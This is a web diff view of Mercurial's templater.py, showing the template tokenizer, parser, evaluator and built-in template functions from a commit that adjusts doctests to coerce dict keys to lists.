##// END OF EJS Templates
doctest: coerce dict.keys() to list...
Yuya Nishihara -
r34141:be00af4a default
parent child Browse files
Show More
@@ -1,1460 +1,1460 b''
1 # templater.py - template expansion for output
1 # templater.py - template expansion for output
2 #
2 #
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import, print_function
8 from __future__ import absolute_import, print_function
9
9
10 import os
10 import os
11 import re
11 import re
12 import types
12 import types
13
13
14 from .i18n import _
14 from .i18n import _
15 from . import (
15 from . import (
16 color,
16 color,
17 config,
17 config,
18 encoding,
18 encoding,
19 error,
19 error,
20 minirst,
20 minirst,
21 obsutil,
21 obsutil,
22 parser,
22 parser,
23 pycompat,
23 pycompat,
24 registrar,
24 registrar,
25 revset as revsetmod,
25 revset as revsetmod,
26 revsetlang,
26 revsetlang,
27 templatefilters,
27 templatefilters,
28 templatekw,
28 templatekw,
29 util,
29 util,
30 )
30 )
31
31
32 # template parsing
32 # template parsing
33
33
# Operator/token table consumed by parser.parser() to drive precedence
# parsing of template expressions.
elements = {
    # token-type: binding-strength, primary, prefix, infix, suffix
    "(": (20, None, ("group", 1, ")"), ("func", 1, ")"), None),
    "%": (16, None, None, ("%", 16), None),
    "|": (15, None, None, ("|", 15), None),
    "*": (5, None, None, ("*", 5), None),
    "/": (5, None, None, ("/", 5), None),
    "+": (4, None, None, ("+", 4), None),
    "-": (4, None, ("negate", 19), ("-", 4), None),
    "=": (3, None, None, ("keyvalue", 3), None),
    ",": (2, None, None, ("list", 2), None),
    ")": (0, None, None, None, None),
    "integer": (0, "integer", None, None, None),
    "symbol": (0, "symbol", None, None, None),
    "string": (0, "string", None, None, None),
    "template": (0, "template", None, None, None),
    "end": (0, None, None, None, None),
}
52
52
def tokenize(program, start, end, term=None):
    """Parse a template expression into a stream of tokens, which must end
    with term if specified.

    Yields (token-type, value, position) triples. Within each branch, pos
    is left on the last consumed character; the trailing ``pos += 1`` at
    the loop bottom advances past it.
    """
    pos = start
    program = pycompat.bytestr(program)
    while pos < end:
        c = program[pos]
        if c.isspace(): # skip inter-token whitespace
            pass
        elif c in "(=,)%|+-*/": # handle simple operators
            yield (c, None, pos)
        elif c in '"\'': # handle quoted templates
            s = pos + 1
            data, pos = _parsetemplate(program, s, end, c)
            yield ('template', data, s)
            pos -= 1
        elif c == 'r' and program[pos:pos + 2] in ("r'", 'r"'):
            # handle quoted strings
            c = program[pos + 1]
            s = pos = pos + 2
            while pos < end: # find closing quote
                d = program[pos]
                if d == '\\': # skip over escaped characters
                    pos += 2
                    continue
                if d == c:
                    yield ('string', program[s:pos], s)
                    break
                pos += 1
            else:
                # while-loop exhausted without hitting the closing quote
                raise error.ParseError(_("unterminated string"), s)
        elif c.isdigit():
            # integer literal: consume the run of digits
            s = pos
            while pos < end:
                d = program[pos]
                if not d.isdigit():
                    break
                pos += 1
            yield ('integer', program[s:pos], s)
            pos -= 1
        elif (c == '\\' and program[pos:pos + 2] in (r"\'", r'\"')
              or c == 'r' and program[pos:pos + 3] in (r"r\'", r'r\"')):
            # handle escaped quoted strings for compatibility with 2.9.2-3.4,
            # where some of nested templates were preprocessed as strings and
            # then compiled. therefore, \"...\" was allowed. (issue4733)
            #
            # processing flow of _evalifliteral() at 5ab28a2e9962:
            # outer template string    -> stringify()  -> compiletemplate()
            # ------------------------    ------------    ------------------
            # {f("\\\\ {g(\"\\\"\")}"}    \\ {g("\"")}    [r'\\', {g("\"")}]
            #             ~~~~~~~~
            #             escaped quoted string
            if c == 'r':
                pos += 1
                token = 'string'
            else:
                token = 'template'
            quote = program[pos:pos + 2]
            s = pos = pos + 2
            while pos < end: # find closing escaped quote
                if program.startswith('\\\\\\', pos, end):
                    pos += 4 # skip over double escaped characters
                    continue
                if program.startswith(quote, pos, end):
                    # interpret as if it were a part of an outer string
                    data = parser.unescapestr(program[s:pos])
                    if token == 'template':
                        data = _parsetemplate(data, 0, len(data))[0]
                    yield (token, data, s)
                    pos += 1
                    break
                pos += 1
            else:
                raise error.ParseError(_("unterminated string"), s)
        elif c.isalnum() or c in '_':
            # symbol (keyword or function name): letters, digits, underscore
            s = pos
            pos += 1
            while pos < end: # find end of symbol
                d = program[pos]
                if not (d.isalnum() or d == "_"):
                    break
                pos += 1
            sym = program[s:pos]
            yield ('symbol', sym, s)
            pos -= 1
        elif c == term:
            # terminator of a nested expression (e.g. '}')
            yield ('end', None, pos + 1)
            return
        else:
            raise error.ParseError(_("syntax error"), pos)
        pos += 1
    if term:
        # caller expected a terminator but input ran out first
        raise error.ParseError(_("unterminated template expansion"), start)
    yield ('end', None, pos)
147
147
def _parsetemplate(tmpl, start, stop, quote=''):
    r"""Parse a template string into a list of parsed nodes.

    Returns (parsed, pos) where pos is the index just past the consumed
    region. If quote is given, parsing stops at the unescaped quote.

    >>> _parsetemplate(b'foo{bar}"baz', 0, 12)
    ([('string', 'foo'), ('symbol', 'bar'), ('string', '"baz')], 12)
    >>> _parsetemplate(b'foo{bar}"baz', 0, 12, quote=b'"')
    ([('string', 'foo'), ('symbol', 'bar')], 9)
    >>> _parsetemplate(b'foo"{bar}', 0, 9, quote=b'"')
    ([('string', 'foo')], 4)
    >>> _parsetemplate(br'foo\"bar"baz', 0, 12, quote=b'"')
    ([('string', 'foo"'), ('string', 'bar')], 9)
    >>> _parsetemplate(br'foo\\"bar', 0, 10, quote=b'"')
    ([('string', 'foo\\')], 6)
    """
    parsed = []
    sepchars = '{' + quote
    pos = start
    p = parser.parser(elements)
    while pos < stop:
        # find the next separator ('{' or closing quote); the key makes
        # "not found" (-1) sort after any real position
        n = min((tmpl.find(c, pos, stop) for c in sepchars),
                key=lambda n: (n < 0, n))
        if n < 0:
            # no more separators: the rest is literal text
            parsed.append(('string', parser.unescapestr(tmpl[pos:stop])))
            pos = stop
            break
        c = tmpl[n:n + 1]
        # count trailing backslashes to decide if the separator is escaped
        bs = (n - pos) - len(tmpl[pos:n].rstrip('\\'))
        if bs % 2 == 1:
            # escaped (e.g. '\{', '\\\{', but not '\\{')
            parsed.append(('string', parser.unescapestr(tmpl[pos:n - 1]) + c))
            pos = n + 1
            continue
        if n > pos:
            parsed.append(('string', parser.unescapestr(tmpl[pos:n])))
        if c == quote:
            return parsed, n + 1

        # '{': parse the embedded expression up to its matching '}'
        parseres, pos = p.parse(tokenize(tmpl, n + 1, stop, '}'))
        parsed.append(parseres)

    if quote:
        raise error.ParseError(_("unterminated string"), start)
    return parsed, pos
190
190
191 def _unnesttemplatelist(tree):
191 def _unnesttemplatelist(tree):
192 """Expand list of templates to node tuple
192 """Expand list of templates to node tuple
193
193
194 >>> def f(tree):
194 >>> def f(tree):
195 ... print(pycompat.sysstr(prettyformat(_unnesttemplatelist(tree))))
195 ... print(pycompat.sysstr(prettyformat(_unnesttemplatelist(tree))))
196 >>> f((b'template', []))
196 >>> f((b'template', []))
197 (string '')
197 (string '')
198 >>> f((b'template', [(b'string', b'foo')]))
198 >>> f((b'template', [(b'string', b'foo')]))
199 (string 'foo')
199 (string 'foo')
200 >>> f((b'template', [(b'string', b'foo'), (b'symbol', b'rev')]))
200 >>> f((b'template', [(b'string', b'foo'), (b'symbol', b'rev')]))
201 (template
201 (template
202 (string 'foo')
202 (string 'foo')
203 (symbol 'rev'))
203 (symbol 'rev'))
204 >>> f((b'template', [(b'symbol', b'rev')])) # template(rev) -> str
204 >>> f((b'template', [(b'symbol', b'rev')])) # template(rev) -> str
205 (template
205 (template
206 (symbol 'rev'))
206 (symbol 'rev'))
207 >>> f((b'template', [(b'template', [(b'string', b'foo')])]))
207 >>> f((b'template', [(b'template', [(b'string', b'foo')])]))
208 (string 'foo')
208 (string 'foo')
209 """
209 """
210 if not isinstance(tree, tuple):
210 if not isinstance(tree, tuple):
211 return tree
211 return tree
212 op = tree[0]
212 op = tree[0]
213 if op != 'template':
213 if op != 'template':
214 return (op,) + tuple(_unnesttemplatelist(x) for x in tree[1:])
214 return (op,) + tuple(_unnesttemplatelist(x) for x in tree[1:])
215
215
216 assert len(tree) == 2
216 assert len(tree) == 2
217 xs = tuple(_unnesttemplatelist(x) for x in tree[1])
217 xs = tuple(_unnesttemplatelist(x) for x in tree[1])
218 if not xs:
218 if not xs:
219 return ('string', '') # empty template ""
219 return ('string', '') # empty template ""
220 elif len(xs) == 1 and xs[0][0] == 'string':
220 elif len(xs) == 1 and xs[0][0] == 'string':
221 return xs[0] # fast path for string with no template fragment "x"
221 return xs[0] # fast path for string with no template fragment "x"
222 else:
222 else:
223 return (op,) + xs
223 return (op,) + xs
224
224
def parse(tmpl):
    """Parse template string into tree"""
    end = len(tmpl)
    parsed, pos = _parsetemplate(tmpl, 0, end)
    # a bare (unquoted) template has no terminator, so everything must
    # have been consumed
    assert pos == end, 'unquoted template should be consumed'
    return _unnesttemplatelist(('template', parsed))
230
230
def _parseexpr(expr):
    """Parse a template expression into tree

    >>> _parseexpr(b'"foo"')
    ('string', 'foo')
    >>> _parseexpr(b'foo(bar)')
    ('func', ('symbol', 'foo'), ('symbol', 'bar'))
    >>> _parseexpr(b'foo(')
    Traceback (most recent call last):
    ...
    ParseError: ('not a prefix: end', 4)
    >>> _parseexpr(b'"foo" "bar"')
    Traceback (most recent call last):
    ...
    ParseError: ('invalid token', 7)
    """
    p = parser.parser(elements)
    tokens = tokenize(expr, 0, len(expr))
    tree, pos = p.parse(tokens)
    # trailing garbage after a complete expression is an error
    if pos != len(expr):
        raise error.ParseError(_('invalid token'), pos)
    return _unnesttemplatelist(tree)
252
252
def prettyformat(tree):
    # render a parsed tree for debugging; the listed leaf node types are
    # printed inline rather than expanded
    return parser.prettyformat(tree, ('integer', 'string', 'symbol'))
255
255
def compileexp(exp, context, curmethods):
    """Compile parsed template tree to (func, data) pair"""
    op = exp[0]
    if op not in curmethods:
        raise error.ParseError(_("unknown method '%s'") % op)
    # dispatch to the compiler for this node type
    return curmethods[op](exp, context)
262
262
263 # template evaluation
263 # template evaluation
264
264
def getsymbol(exp):
    """Return the name carried by a 'symbol' node; raise ParseError for
    any other node type."""
    if exp[0] != 'symbol':
        raise error.ParseError(_("expected a symbol, got '%s'") % exp[0])
    return exp[1]
269
269
def getlist(x):
    """Flatten a left-nested 'list' parse node into a Python list of
    operand nodes; a falsy node yields the empty list."""
    items = []
    # walk down the left spine iteratively, collecting right operands
    while x:
        if x[0] != 'list':
            items.append(x)
            break
        items.append(x[2])
        x = x[1]
    items.reverse()
    return items
276
276
def gettemplate(exp, context):
    """Compile given template tree or load named template from map file;
    returns (func, data) pair"""
    op = exp[0]
    if op == 'template' or op == 'string':
        return compileexp(exp, context, methods)
    if op == 'symbol':
        # unlike runsymbol(), here 'symbol' is always taken as template name
        # even if it exists in mapping. this allows us to override mapping
        # by web templates, e.g. 'changelogtag' is redefined in map file.
        return context._load(exp[1])
    raise error.ParseError(_("expected template specifier"))
288
288
def findsymbolicname(arg):
    """Find symbolic name for the given compiled expression; returns None
    if nothing found reliably"""
    func, data = arg
    # peel filter applications until we reach a bare symbol (or give up)
    while func is not runsymbol:
        if func is not runfilter:
            return None
        func, data = data[0]
    return data
300
300
def evalfuncarg(context, mapping, arg):
    """Evaluate a compiled (func, data) argument to a concrete value.

    func() may return a string, a generator of strings, or an arbitrary
    object such as a date tuple; generators are collapsed to a string
    because filters do not want them.
    """
    fn, payload = arg
    value = fn(context, mapping, payload)
    if not isinstance(value, types.GeneratorType):
        return value
    return stringify(value)
309
309
def evalboolean(context, mapping, arg):
    """Evaluate given argument as boolean, but also takes boolean literals"""
    func, data = arg
    if func is not runsymbol:
        thing = func(context, mapping, data)
    else:
        thing = func(context, mapping, data, default=None)
        if thing is None:
            # not a template keyword: treat the symbol text itself as a
            # boolean literal such as "true"/"false"
            thing = util.parsebool(data)
    if isinstance(thing, bool):
        return thing
    # other objects are evaluated as strings, which means 0 is True, but
    # empty dict/list should be False as they are expected to be ''
    return bool(stringify(thing))
325
325
def evalinteger(context, mapping, arg, err):
    """Evaluate arg and coerce the result to int; raise ParseError(err)
    when the value is not integer-like."""
    value = evalfuncarg(context, mapping, arg)
    try:
        return int(value)
    except (TypeError, ValueError):
        raise error.ParseError(err)
332
332
def evalstring(context, mapping, arg):
    # evaluate a compiled (func, data) pair and flatten the result to a
    # string
    func, data = arg
    return stringify(func(context, mapping, data))
336
336
def evalstringliteral(context, mapping, arg):
    """Evaluate given argument as string template, but returns symbol name
    if it is unknown"""
    func, data = arg
    if func is runsymbol:
        # unknown symbols fall back to their own name via default=data
        result = func(context, mapping, data, default=data)
    else:
        result = func(context, mapping, data)
    return stringify(result)
346
346
def runinteger(context, mapping, data):
    """Evaluate an 'integer' literal node to a Python int."""
    return int(data)
349
349
def runstring(context, mapping, data):
    """Evaluate a 'string' literal node: the data is the value."""
    return data
352
352
353 def _recursivesymbolblocker(key):
353 def _recursivesymbolblocker(key):
354 def showrecursion(**args):
354 def showrecursion(**args):
355 raise error.Abort(_("recursive reference '%s' in template") % key)
355 raise error.Abort(_("recursive reference '%s' in template") % key)
356 return showrecursion
356 return showrecursion
357
357
def _runrecursivesymbol(context, mapping, key):
    # evaluation-time guard: a template that expands itself is an error
    raise error.Abort(_("recursive reference '%s' in template") % key)
360
360
def runsymbol(context, mapping, key, default=''):
    """Resolve a template symbol: local mapping first, then context
    defaults, then a named template of the same name; keyword functions
    are invoked with the mapping as keyword arguments."""
    v = mapping.get(key)
    if v is None:
        v = context._defaults.get(key)
    if v is None:
        # put poison to cut recursion. we can't move this to parsing phase
        # because "x = {x}" is allowed if "x" is a keyword. (issue4758)
        safemapping = mapping.copy()
        safemapping[key] = _recursivesymbolblocker(key)
        try:
            v = context.process(key, safemapping)
        except TemplateNotFound:
            v = default
    if callable(v):
        # keyword function: call it with the mapping as keyword args
        return v(**pycompat.strkwargs(mapping))
    return v
377
377
def buildtemplate(exp, context):
    """Compile each fragment of a 'template' node; evaluation is deferred
    to runtemplate()."""
    compiled = [compileexp(e, context, methods) for e in exp[1:]]
    return (runtemplate, compiled)
381
381
def runtemplate(context, mapping, template):
    """Lazily evaluate each compiled (func, data) fragment in order."""
    return (func(context, mapping, data) for func, data in template)
385
385
def buildfilter(exp, context):
    """Compile a '|' filter application; the right-hand name may refer to
    a registered filter or to a single-argument template function."""
    name = getsymbol(exp[2])
    if name in context._filters:
        arg = compileexp(exp[1], context, methods)
        return (runfilter, (arg, context._filters[name]))
    if name in funcs:
        fn = funcs[name]
        args = _buildfuncargs(exp[1], context, methods, name, fn._argspec)
        return (fn, args)
    raise error.ParseError(_("unknown function '%s'") % name)
397
397
def runfilter(context, mapping, data):
    """Evaluate a compiled filter application.

    data is an (arg, filt) pair: arg is the compiled input expression and
    filt the filter callable. When the filter cannot handle the input
    type, abort with a message naming the filter (and the source keyword
    when it can be determined).
    """
    arg, filt = data
    thing = evalfuncarg(context, mapping, arg)
    try:
        return filt(thing)
    except (ValueError, AttributeError, TypeError):
        # 'func_name' exists only on Python 2 function objects; fall back
        # to __name__ so the error message is produced (instead of a
        # second AttributeError) on Python 3
        filtname = getattr(filt, 'func_name', None) or filt.__name__
        sym = findsymbolicname(arg)
        if sym:
            msg = (_("template filter '%s' is not compatible with keyword '%s'")
                   % (filtname, sym))
        else:
            msg = _("incompatible use of template filter '%s'") % filtname
        raise error.Abort(msg)
411
411
def buildmap(exp, context):
    """Compile a '%' map operation: the left side yields items, the right
    side is the template applied to each item by runmap()."""
    darg = compileexp(exp[1], context, methods)
    targ = gettemplate(exp[2], context)
    # pack both (func, data) pairs into one flat 4-tuple
    return (runmap, darg + targ)
416
416
def runmap(context, mapping, data):
    """Evaluate the data expression and apply the template to each item,
    yielding one rendered value per item."""
    func, data, tfunc, tdata = data
    d = func(context, mapping, data)
    # prefer the object's own itermaps() protocol when available
    if util.safehasattr(d, 'itermaps'):
        diter = d.itermaps()
    else:
        try:
            diter = iter(d)
        except TypeError:
            if func is runsymbol:
                raise error.ParseError(_("keyword '%s' is not iterable") % data)
            else:
                raise error.ParseError(_("%r is not iterable") % d)

    for i, v in enumerate(diter):
        # each item renders with a copy of the mapping plus its own data
        lm = mapping.copy()
        lm['index'] = i
        if isinstance(v, dict):
            lm.update(v)
            lm['originalnode'] = mapping.get('node')
            yield tfunc(context, lm, tdata)
        else:
            # v is not an iterable of dicts, this happen when 'key'
            # has been fully expanded already and format is useless.
            # If so, return the expanded value.
            yield v
443
443
def buildnegate(exp, context):
    """Compile a unary minus: negate the operand at run time."""
    compiled = compileexp(exp[1], context, exprmethods)
    return (runnegate, compiled)
447
447
def runnegate(context, mapping, data):
    """Evaluate the operand as an integer and return its negation."""
    value = evalinteger(context, mapping, data,
                        _('negation needs an integer argument'))
    return -value
452
452
def buildarithmetic(exp, context, func):
    """Compile a binary arithmetic node; func performs the operation at
    run time."""
    operands = [compileexp(x, context, exprmethods) for x in exp[1:3]]
    return (runarithmetic, (func, operands[0], operands[1]))
457
457
def runarithmetic(context, mapping, data):
    """Apply a binary integer operation to its evaluated operands."""
    func, left, right = data
    err = _('arithmetic only defined on integers')
    a = evalinteger(context, mapping, left, err)
    b = evalinteger(context, mapping, right, err)
    try:
        return func(a, b)
    except ZeroDivisionError:
        raise error.Abort(_('division by zero is not defined'))
468
468
def buildfunc(exp, context):
    """Compile a function-call node; the name may be a registered template
    function or a filter used with call syntax and exactly one argument."""
    name = getsymbol(exp[1])
    if name in funcs:
        fn = funcs[name]
        args = _buildfuncargs(exp[2], context, exprmethods, name, fn._argspec)
        return (fn, args)
    if name in context._filters:
        args = _buildfuncargs(exp[2], context, exprmethods, name, argspec=None)
        if len(args) != 1:
            raise error.ParseError(_("filter %s expects one argument") % name)
        return (runfilter, (args[0], context._filters[name]))
    raise error.ParseError(_("unknown function '%s'") % name)
482
482
def _buildfuncargs(exp, context, curmethods, funcname, argspec):
    """Compile parsed tree of function arguments into list or dict of
    (func, data) pairs

    >>> context = engine(lambda t: (runsymbol, t))
    >>> def fargs(expr, argspec):
    ...     x = _parseexpr(expr)
    ...     n = getsymbol(x[1])
    ...     return _buildfuncargs(x[2], context, exprmethods, n, argspec)
    >>> list(fargs(b'a(l=1, k=2)', b'k l m').keys())
    ['l', 'k']
    >>> args = fargs(b'a(opts=1, k=2)', b'**opts')
    >>> list(args.keys()), list(args[b'opts'].keys())
    (['opts'], ['opts', 'k'])
    """
    def compiledict(xs):
        # compile a name -> tree mapping, preserving argument order
        return util.sortdict((k, compileexp(x, context, curmethods))
                             for k, x in xs.iteritems())
    def compilelist(xs):
        return [compileexp(x, context, curmethods) for x in xs]

    if not argspec:
        # filter or function with no argspec: return list of positional args
        return compilelist(getlist(exp))

    # function with argspec: return dict of named args
    _poskeys, varkey, _keys, optkey = argspec = parser.splitargspec(argspec)
    treeargs = parser.buildargsdict(getlist(exp), funcname, argspec,
                                    keyvaluenode='keyvalue', keynode='symbol')
    compargs = util.sortdict()
    if varkey:
        # '*'-style variadic positionals compile to a list under one key
        compargs[varkey] = compilelist(treeargs.pop(varkey))
    if optkey:
        # '**'-style keyword args compile to a nested sortdict
        compargs[optkey] = compiledict(treeargs.pop(optkey))
    compargs.update(compiledict(treeargs))
    return compargs
519
519
def buildkeyvaluepair(exp, content):
    # 'key=value' is only meaningful as an argument to a function with an
    # argspec (handled by _buildfuncargs); seeing it anywhere else is an error
    raise error.ParseError(_("can't use a key-value pair in this context"))
522
522
# dict of template built-in functions
funcs = {}

# decorator that registers a function (and its help/argspec) into 'funcs'
templatefunc = registrar.templatefunc(funcs)
527
527
@templatefunc('date(date[, fmt])')
def date(context, mapping, args):
    """Format a date. See :hg:`help dates` for formatting
    strings. The default is a Unix date format, including the timezone:
    "Mon Sep 04 15:13:13 2006 0700"."""
    if not (1 <= len(args) <= 2):
        # i18n: "date" is a keyword
        raise error.ParseError(_("date expects one or two arguments"))

    date = evalfuncarg(context, mapping, args[0])
    fmt = None
    if len(args) == 2:
        fmt = evalstring(context, mapping, args[1])
    try:
        # without an explicit format, fall back to util.datestr's default
        if fmt is None:
            return util.datestr(date)
        else:
            return util.datestr(date, fmt)
    except (TypeError, ValueError):
        # i18n: "date" is a keyword
        raise error.ParseError(_("date expects a date information"))
549
549
@templatefunc('dict([[key=]value...])', argspec='*args **kwargs')
def dict_(context, mapping, args):
    """Construct a dict from key-value pairs. A key may be omitted if
    a value expression can provide an unambiguous name."""
    data = util.sortdict()

    # positional values: infer the key from the expression's symbolic name
    for v in args['args']:
        k = findsymbolicname(v)
        if not k:
            raise error.ParseError(_('dict key cannot be inferred'))
        if k in data or k in args['kwargs']:
            raise error.ParseError(_("duplicated dict key '%s' inferred") % k)
        data[k] = evalfuncarg(context, mapping, v)

    # explicit key=value pairs override nothing; duplicates were rejected above
    data.update((k, evalfuncarg(context, mapping, v))
                for k, v in args['kwargs'].iteritems())
    return templatekw.hybriddict(data)
567
567
@templatefunc('diff([includepattern [, excludepattern]])')
def diff(context, mapping, args):
    """Show a diff, optionally
    specifying files to include or exclude."""
    if len(args) > 2:
        # i18n: "diff" is a keyword
        raise error.ParseError(_("diff expects zero, one, or two arguments"))

    def getpatterns(i):
        # return the i-th argument as a one-element pattern list, or [] if
        # the argument is absent or evaluates to an empty string
        if i < len(args):
            s = evalstring(context, mapping, args[i]).strip()
            if s:
                return [s]
        return []

    ctx = mapping['ctx']
    chunks = ctx.diff(match=ctx.match([], getpatterns(0), getpatterns(1)))

    return ''.join(chunks)
587
587
@templatefunc('files(pattern)')
def files(context, mapping, args):
    """All files of the current changeset matching the pattern. See
    :hg:`help patterns`."""
    if not len(args) == 1:
        # i18n: "files" is a keyword
        raise error.ParseError(_("files expects one argument"))

    raw = evalstring(context, mapping, args[0])
    ctx = mapping['ctx']
    m = ctx.match([raw])
    files = list(ctx.matches(m))
    return templatekw.showlist("file", files, mapping)
601
601
@templatefunc('fill(text[, width[, initialident[, hangindent]]])')
def fill(context, mapping, args):
    """Fill many
    paragraphs with optional indentation. See the "fill" filter."""
    if not (1 <= len(args) <= 4):
        # i18n: "fill" is a keyword
        raise error.ParseError(_("fill expects one to four arguments"))

    text = evalstring(context, mapping, args[0])
    # defaults when the optional arguments are omitted
    width = 76
    initindent = ''
    hangindent = ''
    if 2 <= len(args) <= 4:
        width = evalinteger(context, mapping, args[1],
                            # i18n: "fill" is a keyword
                            _("fill expects an integer width"))
        try:
            # args[2]/args[3] may be absent; IndexError keeps the defaults
            initindent = evalstring(context, mapping, args[2])
            hangindent = evalstring(context, mapping, args[3])
        except IndexError:
            pass

    return templatefilters.fill(text, width, initindent, hangindent)
625
625
@templatefunc('formatnode(node)')
def formatnode(context, mapping, args):
    """Obtain the preferred form of a changeset hash. (DEPRECATED)"""
    if len(args) != 1:
        # i18n: "formatnode" is a keyword
        raise error.ParseError(_("formatnode expects one argument"))

    ui = mapping['ui']
    node = evalstring(context, mapping, args[0])
    # full hash in debug mode, abbreviated hash otherwise
    if ui.debugflag:
        return node
    return templatefilters.short(node)
638
638
@templatefunc('pad(text, width[, fillchar=\' \'[, left=False]])',
              argspec='text width fillchar left')
def pad(context, mapping, args):
    """Pad text with a
    fill character."""
    if 'text' not in args or 'width' not in args:
        # i18n: "pad" is a keyword
        raise error.ParseError(_("pad() expects two to four arguments"))

    width = evalinteger(context, mapping, args['width'],
                        # i18n: "pad" is a keyword
                        _("pad() expects an integer width"))

    text = evalstring(context, mapping, args['text'])

    left = False
    fillchar = ' '
    if 'fillchar' in args:
        fillchar = evalstring(context, mapping, args['fillchar'])
        # the fill char may carry color effects, but must render as exactly
        # one character once effects are stripped
        if len(color.stripeffects(fillchar)) != 1:
            # i18n: "pad" is a keyword
            raise error.ParseError(_("pad() expects a single fill character"))
    if 'left' in args:
        left = evalboolean(context, mapping, args['left'])

    # measure display width ignoring color escape sequences
    fillwidth = width - encoding.colwidth(color.stripeffects(text))
    if fillwidth <= 0:
        return text
    if left:
        return fillchar * fillwidth + text
    else:
        return text + fillchar * fillwidth
671
671
@templatefunc('indent(text, indentchars[, firstline])')
def indent(context, mapping, args):
    """Indents all non-empty lines
    with the characters given in the indentchars string. An optional
    third parameter will override the indent for the first line only
    if present."""
    if not (2 <= len(args) <= 3):
        # i18n: "indent" is a keyword
        raise error.ParseError(_("indent() expects two or three arguments"))

    text = evalstring(context, mapping, args[0])
    indent = evalstring(context, mapping, args[1])

    if len(args) == 3:
        firstline = evalstring(context, mapping, args[2])
    else:
        firstline = indent

    # the indent function doesn't indent the first line, so we do it here
    return templatefilters.indent(firstline + text, indent)
692
692
@templatefunc('get(dict, key)')
def get(context, mapping, args):
    """Get an attribute/key from an object. Some keywords
    are complex types. This function allows you to obtain the value of an
    attribute on these types."""
    if len(args) != 2:
        # i18n: "get" is a keyword
        raise error.ParseError(_("get() expects two arguments"))

    dictarg = evalfuncarg(context, mapping, args[0])
    # duck-typed check: anything with a .get() method is acceptable
    if not util.safehasattr(dictarg, 'get'):
        # i18n: "get" is a keyword
        raise error.ParseError(_("get() expects a dict as first argument"))

    key = evalfuncarg(context, mapping, args[1])
    return dictarg.get(key)
709
709
@templatefunc('if(expr, then[, else])')
def if_(context, mapping, args):
    """Conditionally execute based on the result of
    an expression."""
    if not (2 <= len(args) <= 3):
        # i18n: "if" is a keyword
        raise error.ParseError(_("if expects two or three arguments"))

    test = evalboolean(context, mapping, args[0])
    if test:
        # evaluate the 'then' branch lazily
        yield args[1][0](context, mapping, args[1][1])
    elif len(args) == 3:
        # evaluate the optional 'else' branch
        yield args[2][0](context, mapping, args[2][1])
723
723
@templatefunc('ifcontains(needle, haystack, then[, else])')
def ifcontains(context, mapping, args):
    """Conditionally execute based
    on whether the item "needle" is in "haystack"."""
    if not (3 <= len(args) <= 4):
        # i18n: "ifcontains" is a keyword
        raise error.ParseError(_("ifcontains expects three or four arguments"))

    needle = evalstring(context, mapping, args[0])
    haystack = evalfuncarg(context, mapping, args[1])

    if needle in haystack:
        yield args[2][0](context, mapping, args[2][1])
    elif len(args) == 4:
        yield args[3][0](context, mapping, args[3][1])
739
739
@templatefunc('ifeq(expr1, expr2, then[, else])')
def ifeq(context, mapping, args):
    """Conditionally execute based on
    whether 2 items are equivalent."""
    if not (3 <= len(args) <= 4):
        # i18n: "ifeq" is a keyword
        raise error.ParseError(_("ifeq expects three or four arguments"))

    # both sides are compared as rendered strings
    test = evalstring(context, mapping, args[0])
    match = evalstring(context, mapping, args[1])
    if test == match:
        yield args[2][0](context, mapping, args[2][1])
    elif len(args) == 4:
        yield args[3][0](context, mapping, args[3][1])
754
754
@templatefunc('join(list, sep)')
def join(context, mapping, args):
    """Join items in a list with a delimiter."""
    if not (1 <= len(args) <= 2):
        # i18n: "join" is a keyword
        raise error.ParseError(_("join expects one or two arguments"))

    joinset = args[0][0](context, mapping, args[0][1])
    if util.safehasattr(joinset, 'itermaps'):
        # hybrid list/dict: render each member with its own join format
        jf = joinset.joinfmt
        joinset = [jf(x) for x in joinset.itermaps()]

    joiner = " "
    if len(args) > 1:
        joiner = evalstring(context, mapping, args[1])

    # emit the separator between items, but not before the first one
    first = True
    for x in joinset:
        if first:
            first = False
        else:
            yield joiner
        yield x
778
778
@templatefunc('label(label, expr)')
def label(context, mapping, args):
    """Apply a label to generated content. Content with
    a label applied can result in additional post-processing, such as
    automatic colorization."""
    if len(args) != 2:
        # i18n: "label" is a keyword
        raise error.ParseError(_("label expects two arguments"))

    ui = mapping['ui']
    thing = evalstring(context, mapping, args[1])
    # preserve unknown symbol as literal so effects like 'red', 'bold',
    # etc. don't need to be quoted
    label = evalstringliteral(context, mapping, args[0])

    return ui.label(thing, label)
795
795
@templatefunc('latesttag([pattern])')
def latesttag(context, mapping, args):
    """The global tags matching the given pattern on the
    most recent globally tagged ancestor of this changeset.
    If no such tags exist, the "{tag}" template resolves to
    the string "null"."""
    if len(args) > 1:
        # i18n: "latesttag" is a keyword
        raise error.ParseError(_("latesttag expects at most one argument"))

    pattern = None
    if len(args) == 1:
        pattern = evalstring(context, mapping, args[0])

    return templatekw.showlatesttags(pattern, **mapping)
811
811
@templatefunc('localdate(date[, tz])')
def localdate(context, mapping, args):
    """Converts a date to the specified timezone.
    The default is local date."""
    if not (1 <= len(args) <= 2):
        # i18n: "localdate" is a keyword
        raise error.ParseError(_("localdate expects one or two arguments"))

    date = evalfuncarg(context, mapping, args[0])
    try:
        date = util.parsedate(date)
    except AttributeError: # not str nor date tuple
        # i18n: "localdate" is a keyword
        raise error.ParseError(_("localdate expects a date information"))
    if len(args) >= 2:
        tzoffset = None
        tz = evalfuncarg(context, mapping, args[1])
        if isinstance(tz, str):
            # try a symbolic/offset timezone string first (e.g. "+0900");
            # leftover text means it wasn't a pure timezone
            tzoffset, remainder = util.parsetimezone(tz)
            if remainder:
                tzoffset = None
        if tzoffset is None:
            # fall back to interpreting tz as an integer offset in seconds
            try:
                tzoffset = int(tz)
            except (TypeError, ValueError):
                # i18n: "localdate" is a keyword
                raise error.ParseError(_("localdate expects a timezone"))
    else:
        # no tz argument: use the local timezone offset
        tzoffset = util.makedate()[1]
    return (date[0], tzoffset)
842
842
@templatefunc('max(iterable)')
def max_(context, mapping, args, **kwargs):
    """Return the max of an iterable"""
    if len(args) != 1:
        # i18n: "max" is a keyword
        # grammar fix: "one arguments" -> "one argument"
        raise error.ParseError(_("max expects one argument"))

    iterable = evalfuncarg(context, mapping, args[0])
    try:
        return max(iterable)
    except (TypeError, ValueError):
        # empty or non-iterable input raises ValueError/TypeError
        # i18n: "max" is a keyword
        raise error.ParseError(_("max first argument should be an iterable"))
856
856
